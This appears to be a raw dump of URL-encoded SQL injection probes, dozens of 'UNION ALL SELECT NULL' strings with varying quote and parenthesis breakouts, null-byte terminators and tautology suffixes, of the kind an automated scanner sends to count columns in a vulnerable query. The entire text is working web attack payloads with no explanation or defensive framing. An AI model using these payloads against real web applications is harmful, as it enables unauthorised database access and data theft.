1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282097%3D2097 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284949%3D4949 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282799%3D2799 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284967%3D4967 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283184%3D3184 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283481%3D3481 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282643%3D2643 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282805%3D2805 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284873%3D4873 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289831%3D9831 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283535%3D3535 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284320%3D4320 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284082%3D4082 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288252%3D8252 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284474%3D4474 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284494%3D4494 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286916%3D6916 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288918%3D8918 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288420%3D8420 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281512%3D1512 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287389%3D7389 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281508%3D1508 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284267%3D4267 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283867%3D3867 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282446%3D2446 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285664%3D5664 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281871%3D1871 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286545%3D6545 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286331%3D6331 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283397%3D3397 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27sdlX%27%3D%27sdlX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VMBm%27%3D%27VMBm 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Zaiq%27%3D%27Zaiq 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27nArC%27%3D%27nArC 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VGvY%27%3D%27VGvY 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Sogn%27%3D%27Sogn 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VWPv%27%3D%27VWPv 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27fzLU%27%3D%27fzLU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ptjN%27%3D%27ptjN 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27enxm%27%3D%27enxm 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ywce%27%3D%27ywce 